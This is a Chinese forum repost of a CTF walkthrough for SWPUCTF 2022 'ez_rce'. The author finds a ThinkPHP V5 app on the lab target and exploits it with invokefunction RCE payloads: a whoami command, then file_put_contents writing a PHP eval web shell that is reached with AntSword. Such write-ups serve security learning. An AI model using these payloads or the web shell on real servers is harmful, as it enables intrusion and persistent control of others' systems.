[SWPUCTF 2022 新生赛]ez_rce

打印 上一主题 下一主题

主题 840|帖子 840|积分 2520

打开标题就在线环境,发现只有一句话:真的什么都没有吗
F12检察控制台和源代码也没发现任何信息,然后用虚拟机内里的dirsearch扫一下这个网站就能得到:

然后这里扫出来的结果检察的直接就是robots.txt,然后就能看到:

然后访问:/NSS/index.php/

这里直接搜索ThingkPHP V5就能得到这个漏洞复现的方法,我就是根据搜索到的帖子的漏洞复现方法跟着做的。
   payload:?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
  

   ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
  

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>(将php代码写入shell.php)

再访问/NSS/shell.php

然后再
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>(删除/shell.php替换)

末了蚁剑毗连,网址:http://node5.anna.nssctf.cn:22775/NSS/shell.php
暗码为1
末了flag的路径为:/nss/ctf/flag


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

小小小幸运

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表